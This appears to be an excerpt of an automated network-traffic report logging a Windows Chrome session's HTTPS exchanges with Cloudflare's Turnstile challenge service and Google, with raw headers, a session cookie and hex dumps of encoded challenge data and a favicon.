                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:59 GMT
                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  40192.168.2.1649796104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f418ee08bfa41f8/1734550133133/5r7qG9mw9MML0Vh HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:59 GMT
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418f248d527c93-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3f 00 00 00 3a 08 02 00 00 00 88 f0 16 3b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR?:;IDAT$IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  41192.168.2.1649797104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 31129
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  CF-Challenge: ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC16384OUTData Raw: 76 5f 38 66 34 31 38 65 65 30 38 62 66 61 34 31 66 38 3d 54 64 73 5a 36 68 35 39 47 4f 64 35 47 37 39 35 72 49 6e 49 6c 37 75 49 25 32 62 49 6f 49 65 42 68 31 35 70 49 68 42 6f 47 49 24 49 70 78 66 42 42 68 45 35 37 49 34 76 7a 49 35 47 42 49 6a 49 73 32 6f 75 75 75 41 68 49 68 52 49 44 32 59 4b 6f 75 49 59 75 46 49 37 42 68 4f 35 49 4b 43 7a 50 62 49 59 4a 45 49 46 5a 68 6d 47 6d 49 68 32 49 4f 2b 61 32 59 68 49 35 24 75 49 4e 33 49 4f 7a 4b 72 52 5a 6f 31 6c 37 36 54 35 49 76 47 49 6e 24 49 44 62 42 49 53 49 6f 62 49 37 32 49 4a 65 42 35 4a 6d 4b 68 56 33 5a 35 74 4f 33 32 47 4e 6b 36 75 31 36 75 6d 45 62 36 32 79 42 31 49 6d 43 47 49 52 56 42 44 4b 4f 31 49 35 45 48 42 46 2b 66 34 49 59 62 76 51 2b 75 68 78 76 33 43 51 47 35 54 4f 6c 63 56 6f 30 6e 72
                                                                                                                                                                                                                                  Data Ascii: v_8f418ee08bfa41f8=TdsZ6h59GOd5G795rInIl7uI%2bIoIeBh15pIhBoGI$IpxfBBhE57I4vzI5GBIjIs2ouuuAhIhRID2YKouIYuFI7BhO5IKCzPbIYJEIFZhmGmIh2IO+a2YhI5$uIN3IOzKrRZo1l76T5IvGIn$IDbBISIobI72IJeB5JmKhV3Z5tO32GNk6u16umEb62yB1ImCGIRVBDKO1I5EHBF+f4IYbvQ+uhxv3CQG5TOlcVo0nr
                                                                                                                                                                                                                                  2024-12-18 19:28:59 UTC14745OUTData Raw: 63 59 50 5a 31 49 59 32 6f 43 24 24 4f 73 4f 55 2d 58 71 6f 42 44 49 72 49 73 5a 37 42 49 55 49 75 49 49 73 49 51 5a 48 32 75 44 49 51 49 35 32 59 74 62 6d 49 35 32 4f 57 5a 4c 49 62 46 37 6d 35 70 56 38 5a 75 75 35 62 49 39 42 37 4e 5a 6a 49 70 42 37 44 35 74 49 2b 5a 68 45 35 4c 49 70 45 6f 51 4d 78 49 65 32 59 46 35 6f 49 37 73 48 39 35 34 59 37 33 4f 57 5a 6d 64 4c 5a 49 47 68 56 49 33 5a 70 57 5a 65 49 79 5a 54 47 59 33 49 66 5a 4b 6d 68 79 49 56 5a 6b 47 59 72 49 57 5a 33 6d 68 4b 49 53 5a 33 64 59 52 49 4d 5a 4a 64 68 4e 49 32 42 62 64 59 2d 49 31 42 33 75 68 52 49 45 42 4b 75 68 56 49 5a 42 62 31 68 7a 49 69 42 33 31 68 70 49 30 42 54 31 59 50 49 56 42 70 44 59 57 49 67 42 73 44 59 74 49 2d 42 6b 31 68 6d 71 70 73 6f 68 6d 48 63 24 71 32 6d 68 52
                                                                                                                                                                                                                                  Data Ascii: cYPZ1IY2oC$$OsOU-XqoBDIrIsZ7BIUIuIIsIQZH2uDIQI52YtbmI52OWZLIbF7m5pV8Zuu5bI9B7NZjIpB7D5tI+ZhE5LIpEoQMxIe2YF5oI7sH954Y73OWZmdLZIGhVI3ZpWZeIyZTGY3IfZKmhyIVZkGYrIWZ3mhKISZ3dYRIMZJdhNI2BbdY-I1B3uhRIEBKuhVIZBb1hzIiB31hpI0BT1YPIVBpDYWIgBsDYtI-Bk1hmqpsohmHc$q2mhR
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:59 GMT
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 26284
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cf-chl-gen: vcvUEevvpTYKfYy5S8FQn8uffGz0SEfg/dGy8k1inlZfrhlA5xAepQzG/1GUJUp4DNfK27Gt1YHJ3Et7$eP8eYVSRnupi4ru8
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418f246ea4439a-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1039INData Raw: 58 5a 46 79 54 6d 46 6f 6c 57 65 4b 61 35 56 70 6a 35 39 2b 63 36 4e 68 67 58 74 33 67 6f 6c 2f 65 34 57 72 6e 48 71 4a 61 47 6d 4a 68 72 47 71 69 48 43 69 70 62 69 50 65 35 31 32 75 72 53 52 6f 59 52 33 6f 70 53 51 75 36 65 54 79 73 65 70 6d 62 36 71 69 4a 33 4b 69 38 4f 31 79 38 7a 47 78 73 33 4b 32 37 53 64 6c 36 71 38 31 64 69 79 77 71 65 66 70 64 53 69 6e 37 7a 6a 32 63 50 68 71 37 79 31 72 72 57 79 75 4f 6e 4d 31 2b 76 56 32 2f 62 42 75 38 47 2f 31 65 50 50 43 4f 48 42 77 63 49 49 32 63 48 70 35 65 34 46 7a 76 41 55 42 51 67 4c 30 4f 7a 31 39 66 6e 39 36 39 67 6b 47 2b 45 55 33 42 59 4a 36 53 6f 69 47 66 62 6c 37 75 67 6b 42 51 6f 56 41 68 49 58 4e 50 4d 78 39 79 67 33 4b 50 77 57 44 54 58 2b 39 6a 6c 49 42 53 49 39 51 41 6f 58 4a 45 5a 52 48 43 30
                                                                                                                                                                                                                                  Data Ascii: XZFyTmFolWeKa5Vpj59+c6NhgXt3gol/e4WrnHqJaGmJhrGqiHCipbiPe512urSRoYR3opSQu6eTysepmb6qiJ3Ki8O1y8zGxs3K27Sdl6q81diywqefpdSin7zj2cPhq7y1rrWyuOnM1+vV2/bBu8G/1ePPCOHBwcII2cHp5e4FzvAUBQgL0Oz19fn969gkG+EU3BYJ6SoiGfbl7ugkBQoVAhIXNPMx9yg3KPwWDTX+9jlIBSI9QAoXJEZRHC0
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 38 6c 6e 4e 57 66 35 64 34 67 6e 79 58 70 34 6d 62 64 6e 36 69 68 34 71 6d 66 59 75 4f 62 71 79 53 68 6e 4b 73 75 72 52 78 72 70 65 4b 77 37 57 59 78 49 53 33 6e 61 4b 49 75 35 2b 6c 78 4a 32 2b 76 4c 53 74 6a 4e 53 50 72 62 54 61 72 39 53 62 73 72 6a 42 77 73 48 41 30 70 33 64 78 36 4f 37 34 4d 65 35 7a 62 6e 50 37 61 2f 61 73 66 48 4a 73 75 50 47 37 65 62 6b 30 72 76 62 36 65 7a 55 34 4f 76 51 39 73 50 50 42 39 54 63 33 77 57 2f 2b 4f 7a 51 45 51 62 69 37 2b 44 79 7a 2b 2f 70 47 78 55 4c 31 2b 76 73 33 2f 4c 7a 37 2f 44 36 39 78 6f 46 39 76 30 4a 4a 67 6f 73 4b 2b 59 76 45 65 76 74 49 51 54 70 42 75 73 4c 48 54 63 37 46 52 59 31 48 50 7a 2b 4c 52 42 45 4a 30 4d 35 47 52 55 69 4c 51 68 45 4a 69 31 49 4b 55 55 49 55 6a 4e 4d 4d 6b 5a 46 53 6b 77 5a 58 30
                                                                                                                                                                                                                                  Data Ascii: 8lnNWf5d4gnyXp4mbdn6ih4qmfYuObqyShnKsurRxrpeKw7WYxIS3naKIu5+lxJ2+vLStjNSPrbTar9SbsrjBwsHA0p3dx6O74Me5zbnP7a/asfHJsuPG7ebk0rvb6ezU4OvQ9sPPB9Tc3wW/+OzQEQbi7+Dyz+/pGxUL1+vs3/Lz7/D69xoF9v0JJgosK+YvEevtIQTpBusLHTc7FRY1HPz+LRBEJ0M5GRUiLQhEJi1IKUUIUjNMMkZFSkwZX0
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 5a 4b 69 4a 6e 49 74 71 6d 61 31 72 67 36 32 4a 72 34 36 65 69 6f 39 7a 6b 33 71 51 6d 48 69 32 73 58 75 4b 6f 6e 72 41 72 34 43 2f 67 4c 53 45 6c 5a 36 34 7a 49 69 69 70 72 75 6f 77 37 65 32 72 39 43 6f 75 63 61 72 32 4c 79 63 75 72 32 36 30 75 57 36 32 4c 53 37 74 72 72 62 70 4e 6e 63 33 65 72 41 32 2b 48 4f 30 76 69 77 79 73 6e 50 30 63 37 52 7a 66 4c 38 2f 4d 4c 68 33 4f 44 35 39 67 67 44 44 4e 6a 4b 31 76 72 49 41 39 34 4c 42 66 41 4b 44 73 72 53 44 67 6a 6c 38 42 30 49 44 68 45 59 2f 66 6e 39 4a 78 4d 49 43 69 6a 72 47 67 7a 75 4b 77 38 67 4d 2b 6f 42 4b 68 63 5a 37 79 73 58 2b 75 37 36 4f 7a 73 66 2f 6a 6b 59 51 41 38 58 42 6b 64 41 4b 69 52 49 50 30 41 38 53 6b 34 67 54 30 70 55 44 30 56 46 53 46 41 32 4d 78 63 72 55 44 70 44 59 45 78 67 48 6a 74
                                                                                                                                                                                                                                  Data Ascii: ZKiJnItqma1rg62Jr46eio9zk3qQmHi2sXuKonrAr4C/gLSElZ64zIiipruow7e2r9Coucar2Lycur260uW62LS7trrbpNnc3erA2+HO0viwysnP0c7RzfL8/MLh3OD59ggDDNjK1vrIA94LBfAKDsrSDgjl8B0IDhEY/fn9JxMICijrGgzuKw8gM+oBKhcZ7ysX+u76Ozsf/jkYQA8XBkdAKiRIP0A8Sk4gT0pUD0VFSFA2MxcrUDpDYExgHjt
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 6d 36 68 67 36 31 76 70 32 64 31 6b 57 2b 4a 6d 35 65 5a 75 59 6d 61 6e 34 47 68 6e 4b 43 76 6e 62 4b 6e 71 72 65 6f 71 63 4f 67 78 6f 4b 39 72 61 75 4b 73 73 65 73 31 62 43 6b 75 4d 62 53 73 4e 61 57 74 37 32 77 75 62 66 43 77 38 48 42 35 36 57 72 78 4d 36 6c 79 2b 4b 79 37 76 48 69 72 2f 50 6c 73 4c 57 35 31 39 4f 32 38 63 76 56 34 38 7a 7a 31 76 72 39 2b 39 38 43 2b 64 66 69 41 4e 6e 4a 34 2b 59 4b 7a 67 63 52 31 76 6e 34 34 76 73 47 32 2f 41 61 37 77 72 64 46 75 44 78 46 2f 7a 68 46 50 4c 2b 41 79 73 75 35 69 58 76 44 67 66 79 42 42 44 78 4b 67 76 34 46 78 76 33 44 78 51 35 41 44 63 52 42 55 63 33 46 67 55 37 4d 78 78 4a 47 53 45 6b 55 68 31 4c 49 45 73 49 51 54 55 5a 57 55 34 72 4f 43 6b 37 47 44 67 79 59 31 6c 42 57 53 39 63 49 79 4a 70 50 53 5a 4c
                                                                                                                                                                                                                                  Data Ascii: m6hg61vp2d1kW+Jm5eZuYman4GhnKCvnbKnqreoqcOgxoK9rauKsses1bCkuMbSsNaWt72wubfCw8HB56WrxM6ly+Ky7vHir/PlsLW519O28cvV48zz1vr9+98C+dfiANnJ4+YKzgcR1vn44vsG2/Aa7wrdFuDxF/zhFPL+Aysu5iXvDgfyBBDxKgv4Fxv3DxQ5ADcRBUc3FgU7MxxJGSEkUh1LIEsIQTUZWU4rOCk7GDgyY1lBWS9cIyJpPSZL
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 69 4f 64 4c 47 6f 72 36 69 33 6b 6f 79 4f 76 62 36 69 6c 63 4b 6d 68 49 2b 42 68 62 69 55 6f 62 69 4d 70 49 62 4a 6a 4d 2b 7a 7a 5a 4b 58 31 63 32 54 78 70 4b 61 70 73 75 76 79 74 76 4f 77 4b 4f 35 7a 36 58 6b 34 64 54 65 36 63 53 75 36 38 44 4a 78 36 71 6e 74 4e 44 72 77 62 47 34 35 72 69 36 30 2f 58 41 76 4f 44 36 30 4c 33 32 42 73 48 53 78 67 72 36 2b 4f 41 52 33 75 33 6c 44 50 59 56 43 2b 34 51 36 39 6a 79 44 78 6a 62 38 68 77 53 33 68 6e 37 47 76 6e 2b 34 43 54 38 41 79 38 68 4a 65 6b 4f 4b 50 41 68 4e 69 63 49 4b 51 73 72 44 52 4d 4b 4f 44 59 65 38 7a 63 43 48 7a 73 31 42 41 49 32 52 51 6b 57 44 6a 73 78 41 30 5a 4d 53 6a 30 6d 54 42 51 7a 54 30 6b 58 48 52 35 58 53 54 4e 4e 57 46 6f 6c 49 6c 35 4a 49 6c 78 64 59 32 6c 46 61 44 39 70 61 6d 78 46 53
                                                                                                                                                                                                                                  Data Ascii: iOdLGor6i3koyOvb6ilcKmhI+BhbiUobiMpIbJjM+zzZKX1c2TxpKapsuvytvOwKO5z6Xk4dTe6cSu68DJx6qntNDrwbG45ri60/XAvOD60L32BsHSxgr6+OAR3u3lDPYVC+4Q69jyDxjb8hwS3hn7Gvn+4CT8Ay8hJekOKPAhNicIKQsrDRMKODYe8zcCHzs1BAI2RQkWDjsxA0ZMSj0mTBQzT0kXHR5XSTNNWFolIl5JIlxdY2lFaD9pamxFS
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 39 75 4c 6d 36 74 62 36 30 72 4c 54 46 75 6f 4f 46 76 49 54 44 74 4d 33 44 73 49 4b 61 78 36 57 71 31 63 53 34 6b 63 2f 52 6d 39 7a 58 6c 35 48 5a 79 36 47 5a 74 35 32 6c 75 65 6e 64 70 75 69 2f 70 4b 44 46 38 65 33 72 79 61 32 75 72 2b 4f 71 30 76 62 4f 7a 75 62 7a 39 39 2f 74 2b 66 7a 57 38 50 76 43 31 76 4d 42 79 64 37 57 42 50 63 42 42 38 7a 71 36 77 2f 56 45 65 49 55 32 42 6a 61 31 74 67 64 45 67 76 66 48 79 58 65 33 78 54 61 41 79 66 2b 2f 68 63 6b 4b 42 41 65 4b 69 30 48 49 53 7a 79 42 79 51 78 2b 51 38 48 4e 43 67 78 4e 2f 77 62 47 45 62 34 48 51 63 44 43 7a 55 58 53 41 31 4d 44 31 4d 53 54 31 4a 45 55 6c 4e 4f 56 30 31 46 54 56 35 54 48 42 35 56 48 56 78 4e 5a 6c 78 4a 47 7a 4e 67 50 6b 4e 75 58 56 45 71 61 47 6f 30 64 6e 63 32 64 48 70 6d 4f 56
                                                                                                                                                                                                                                  Data Ascii: 9uLm6tb60rLTFuoOFvITDtM3DsIKax6Wq1cS4kc/Rm9zXl5HZy6GZt52luendpui/pKDF8e3rya2ur+Oq0vbOzubz99/t+fzW8PvC1vMByd7WBPcBB8zq6w/VEeIU2Bja1tgdEgvfHyXe3xTaAyf+/hckKBAeKi0HISzyByQx+Q8HNCgxN/wbGEb4HQcDCzUXSA1MD1MST1JEUlNOV01FTV5THB5VHVxNZlxJGzNgPkNuXVEqaGo0dnc2dHpmOV
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 77 4a 65 2b 68 58 6d 54 79 6f 72 48 79 59 65 4e 67 64 48 51 6b 73 43 76 6a 4a 47 75 72 39 4b 59 73 73 57 57 6e 74 79 33 6d 4b 4b 5a 75 39 4f 6c 35 4c 2b 68 71 74 6a 48 37 61 37 73 76 36 75 79 79 62 2f 31 71 4d 37 6c 73 72 65 78 36 62 61 2b 31 73 2b 35 76 64 72 58 76 63 58 30 34 38 54 49 34 76 6b 48 7a 51 33 6e 41 4e 45 51 46 68 62 57 37 75 66 51 32 52 6b 4f 48 39 33 52 36 79 48 68 49 52 49 66 35 68 58 33 34 4f 67 44 43 4f 54 70 42 77 41 78 35 41 73 69 37 66 59 31 4b 76 48 36 4b 52 51 73 2f 53 30 75 51 77 4e 42 49 50 34 48 2b 55 70 4c 43 7a 67 59 54 51 39 4e 4c 41 6b 53 51 55 4a 57 46 53 38 30 46 52 59 7a 54 68 55 63 46 6c 49 63 49 31 45 38 58 79 63 2b 5a 6c 67 71 61 55 77 6f 49 55 64 45 63 54 4a 68 5a 6a 45 79 54 32 70 35 4f 31 4e 51 66 6a 39 74 59 49 45
                                                                                                                                                                                                                                  Data Ascii: wJe+hXmTyorHyYeNgdHQksCvjJGur9KYssWWnty3mKKZu9Ol5L+hqtjH7a7sv6uyyb/1qM7lsrex6ba+1s+5vdrXvcX048TI4vkHzQ3nANEQFhbW7ufQ2RkOH93R6yHhIRIf5hX34OgDCOTpBwAx5Asi7fY1KvH6KRQs/S0uQwNBIP4H+UpLCzgYTQ9NLAkSQUJWFS80FRYzThUcFlIcI1E8Xyc+ZlgqaUwoIUdEcTJhZjEyT2p5O1NQfj9tYIE
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1369INData Raw: 62 69 67 79 62 75 38 78 63 53 66 77 35 50 52 77 38 61 6e 7a 4b 66 4c 6d 39 6e 4c 79 39 75 53 72 70 32 79 6f 75 4c 67 30 75 65 62 70 63 4b 2f 31 74 2f 6f 76 39 76 66 37 37 2f 32 74 65 4c 30 7a 2f 54 6d 2b 36 2b 35 31 74 4d 43 75 37 58 4f 34 63 54 46 32 2f 50 33 43 4e 58 4d 79 67 55 4e 35 38 7a 6a 38 77 6f 45 35 39 54 58 31 68 4c 37 42 39 66 52 36 64 50 67 33 64 6f 55 46 4e 6e 61 38 65 58 37 39 79 73 62 48 50 6e 74 38 50 45 49 49 43 4d 30 41 76 6e 7a 37 51 62 36 2f 50 6b 2b 4d 43 2f 31 42 51 55 43 46 30 70 48 4f 6a 67 58 47 77 30 4f 4a 44 78 41 51 42 38 79 45 42 55 4c 49 30 74 4a 4e 7a 55 64 48 6a 52 4d 55 6c 41 76 4c 31 64 56 51 30 45 6b 48 6a 63 33 58 31 31 48 53 54 45 79 53 47 42 6b 54 6b 4e 44 61 32 6c 54 56 54 67 79 53 30 74 7a 63 56 64 64 52 55 5a 63
                                                                                                                                                                                                                                  Data Ascii: bigybu8xcSfw5PRw8anzKfLm9nLy9uSrp2youLg0uebpcK/1t/ov9vf77/2teL0z/Tm+6+51tMCu7XO4cTF2/P3CNXMygUN58zj8woE59TX1hL7B9fR6dPg3doUFNna8eX79ysbHPnt8PEIICM0Avnz7Qb6/Pk+MC/1BQUCF0pHOjgXGw0OJDxAQB8yEBULI0tJNzUdHjRMUlAvL1dVQ0EkHjc3X11HSTEySGBkTkNDa2lTVTgyS0tzcVddRUZc


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  42192.168.2.1649798142.250.181.1324436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:00 UTC1235OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://accounts.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC705INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                  Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                  Content-Length: 5430
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:06:29 GMT
                                                                                                                                                                                                                                  Expires: Thu, 26 Dec 2024 19:06:29 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                  Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Age: 1352
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                                                                                                  Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                                                                                                  2024-12-18 19:29:01 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
